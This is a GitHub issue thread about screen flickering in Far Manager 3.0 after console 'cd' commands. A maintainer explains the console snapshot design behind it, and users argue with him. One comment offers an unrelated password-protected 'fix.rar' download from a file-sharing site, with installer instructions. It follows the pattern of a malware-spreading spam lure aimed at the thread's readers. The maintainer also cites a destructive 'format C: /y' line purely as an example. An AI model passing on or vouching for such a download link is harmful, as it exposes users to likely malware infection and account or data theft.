### ISSUE TITLE
Changing drive or folder with console commands causes screen flickering in certain cases

### ISSUE THREAD

**Issue by yulian5** [FarGroup/FarManager#868]
### Far Manager version

3.0.6361.3956

### OS version

 10.0.19045.4651

### Steps to reproduce

Change drive with console command directly or through user menu, go inside the folder something like (try any of them):

```
cd /d %USERPROFILE%\Documents
d:
cd /d c:\Windows
```

In most cases it will be flickering on the screen: Far old screen->Console window->Far new screen

Commands like (and sometimes change the drive with console):

```
cd ..
cd \

```
do not create flickering. Changing drive with Far menu also looks OK.

The issue was introduced somewhere between version 3.0.6335 and the current one. I didn't notice that immediately as I'm using my custom build.

### Expected behavior

No flickering changing folder as it was with version 3.0.6335 and before.

### Actual behavior

Screen flickering in certain cases.

**Comment by yegor-mialyk** [comment]
No flickering for me under Windows 11 [Version 10.0.26100.1586] / Far 3.0.6361.0 x64
Both `cd .....` and `cd /D .....` should be handled internally w/o invoking CMD.

**Comment by lowtrucks** [comment]
i can confirm that behavior. i use ConEmu and i got flickering, when doing commands from Start Menu. and yes, it started several versions ago (about 1 month ago), but i used to live with it. :)

**Comment by yegor-mialyk** [comment]
Downloaded ConEmu and yes, I can reproduce it under ConEmu, but w/o ConEmu it works perfectly. Is this a Far Manager issue then?

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yegor-mialyk** [comment]
could it be caused by 6348? Maybe it is even by design.
```
drkns 2024-07-18 01:23:45+01:00 - build 6348

1. Use console pages (DECCRA) to preserve content, not supported by ReadConsoleOutput.
   See microsoft/terminal#10810 for details.

2. Propagate command execution information to the terminal (OSC133 & OSC9001).
```

**Comment by yulian5** [comment]
> No flickering for me under Windows 11 [Version 10.0.26100.1586] / Far 3.0.6361.0 x64 / Conhost

Actually there is a flickering.

Far.x64.3.0.6364.3959, Microsoft Windows [Version 10.0.22631.3880], Conhost

Fresh Far only with only 2 menu commands (works directly with console as well):
cd /d %USERPROFILE%\Documents
cd ..
**A few first executions went well without flickering**, then after about 10 attempts flickering started 100% for "cd /d..." and even for "cd .." in some cases.

**Comment by yulian5** [comment]
> Maybe it is even by design.

Flickering by design sounds weird.

**Comment by yegor-mialyk** [comment]
> Flickering by design sounds weird.

You win some, you lose some.

**Comment by alabuzhev** [comment]
It is indeed by design now.
The full story is too large to fit in the comment.

**Comment by montoner0** [comment]
I don't see why you need to flicker panels when launch anything. That's some pretty bad "design".

**Comment by alabuzhev** [comment]
> I don't see why you need to flicker panels when launch anything. That's some pretty bad "design".

Oh, it's a lot worse than you think, but your confidence in critiquing the unknown is admirable.
I suppose we can all learn from you - if only as a reminder of what not to do.

However, this question will probably come up again anyway, so I'll explain it.

Indeed, it is possible to launch things completely quietly, why not.
But you don't want it to be completely quiet.
You want a new line to appear in the output with the prompt and the command that you've just entered, right after the previous output, e.g. `C:\>cd /d c:\Windows` or `C:\>banana.exe`, as a reminder of what happened and when, like in all decent shells.

To be able to show the output on demand we take a snapshot of the viewport when the command finishes.
When it's time to redraw the screen, we internally compose multiple layers (output snapshot, panels, dialogs, menus) into a single flat image and draw it.
See [this slide](https://github.com/microsoft/terminal/issues/10810#issuecomment-1163325484) for techical details.

So, a line like `C:\>whatever` can make it into the output snapshot in two ways:
- We physically print it and then take a snapshot
- We meddle with the internal in-memory representation of an existing snapshot to sort of scroll everything up and sort of append it at the bottom.

Historically we were using both: the first one for console apps, the second one for gui and commands that are (sometimes) handled internally, like `cd`.
It is noteworthy that the second one was not designed specifically for launching without flickering or something: meddling with memory buffers is just faster and easier than doing things with console, so why not.

Notably, for this logic to work the snapshot should be lossless, i.e. it should perfectly represent the actual console state.
Historically the only way to get such a snapshot was ReadConsoleOutput and it even worked flawlessly for about 20 years.
Until Windows 10, where MS introduced VT sequences and all the madness that they unlock, like 256 and RGB colors, text styles, grapheme clusters, sixels and who knows what else.
ReadConsoleOutput works with CHAR_INFOs, and a CHAR_INFO can represent a BMP Unicode character, two 4-bit colors and a couple of exotic flags, that's all.
[It cannot represent all that luxury](https://github.com/microsoft/terminal/issues/292) and MS has no intention to extend it.

So, recently this logic suddenly stopped working in some cases: you run something that produces a funny looking output with rainbow colors and styled text and you look at it for a fraction of a second and then it's gone and there is only [a disfigured copy](https://github.com/FarGroup/FarManager/issues/873).

Eventually MS added a new way to save and restore snapshots, but such snapshots are entirely opaque for the calling application.
Which means that we cannot meddle with the internal in-memory representation of an existing snapshot anymore. Because it's opaque, duh.
To update it, e.g. to add a new line like `C:\>format C: /y` at the bottom, we have to physically restore the last opaque snapshot to the screen, write the text where it should be and take a new opaque snapshot.

So that's it: we can preserve the output in pristine condition now, but there are no in-memory buffer modification shenanigans anymore.

In theory we can try something smarter and instead of restoring & appending & retaking calculate how much such an appending would've shifted things up in the snapshot if it was actually performed and keep that offset and later, when you need to see the output, restore the snapshot not where it originally was, but upper at that offset, thus delaying the flushing and avoiding the flickering.
However, that would likely further complicate already way too complex logic, make it more error-prone and negatively impact the maintainability of the project. Unfortunately, currently I have neither time nor inspiration to explore this direction further, but you are welcome to do so.

Some like it when it flickers for a fraction of a second and say that it's a good indication that something has actually happened.
Some don't.
It flipped several times over the years as we were trying and refining different approaches.

In any case, this is not a USP of the product, unlike preserving the command output and making it available on demand without FUBARing it.

So yes, it's by design.

**Comment by montoner0** [comment]
> but your confidence in critiquing the unknown is admirable

And what did you expect? You've broken well-established UX and users aren't happy.

> But you don't want it to be completely quiet.

Yes, I want.

> You want a new line to appear in the output with the prompt and the command that you've just entered, right after the previous output, e.g. C:\>cd /d c:\Windows or C:\>banana.exe, as a reminder of what happened and when, like in all decent shells.

No, I don't. Especially when I "launch" some document. The command line for the document is irrelevant for me, moreover - redundant. The Far's commands history is more than enough for cases "a reminder of what happened and when" (even though it doesn't have timestamps).

> However, that would likely further complicate already way too complex logic...

What about not trying to pretend to be a shell but just run documents without all these mumbo-jumbo with buffers and such? The only case when you need a console output is from console apps.

> it's a good indication that something has actually happened

There are less frustrating ways to indicate such things than a full screen flickering.

I see your point but I'm still quite sure that you can run documents or similar entities without showing us a console. Far isn't a shell, it's a file manager.

**Comment by alabuzhev** [comment]
> Especially when I "launch" some document

> just run documents

> I'm still quite sure that you can run documents or similar entities without showing us a console

It is quite interesting that you are so focused on documents, because 6348 changed nothing is this regard - this particular operation was flickering before that as well, for rather obvious reasons.

**Comment by montoner0** [comment]
> 6348 changed nothing is this regard

Before 6348 I could press Shift-Enter on any non-executable file and it opened in an associated app without flickering. Now it's not.

**Comment by alabuzhev** [comment]
Ah, shift-enter.
Well, my condolences then.
For you flickering is breaking of "well-established UX" and the output is irrelevant, for someone else it will be the opposite.
[Every change breaks someone's workflow](https://xkcd.com/1172/).

**Comment by montoner0** [comment]
Sane developers don't break UX which existed for years (and I'm not talking about some weird examples, it's pretty legitimate feature). I see your attitude toward users as arrogant and counterproductive. No wonder Far is in such a deep stagnation. Good luck with that then.

**Comment by MKadaner** [comment]
> Especially when I "launch" some document

> just run documents

> I'm still quite sure that you can run documents or similar entities without showing us a console

What is a "document" anyway? Far is for command line applications, like FC or DISKPART or REG. There are tons of perfectly usable DOS commands, why anybody would need anything else?

**Comment by montoner0** [comment]
> There are tons of perfectly usable DOS commands, why anybody would need anything else?

Yeah, look all day on the output of dir c:\ /s

**Comment by Zeroes1** [comment]
Может кому поможет, запуск без мерцания можно настроить по ассоциации
пример:
*.docx
действие по Enter:
lua:win.ShellExecute(nil, 'open', far.ConvertPath(APanel.Current))

**Comment by yulian5** [comment]
@alabuzhev noted:
> So, recently this logic suddenly stopped working in some cases: you run something that produces a funny looking output with rainbow colors and styled text and you look at it for a fraction of a second and then it's gone and there is only https://github.com/FarGroup/FarManager/issues/873.

So instead of "some cases" which I've never experienced by myself (and seems more theoretical than practical) we have almost constant flickering "by design now".

I'm tend mostly agree with @montoner0, that's not a good "design" at all. I prefer "funny looking output" which doesn't stress my eyes like flickering. And such kind of changes should at least give the user to choice what the user actually prefers.
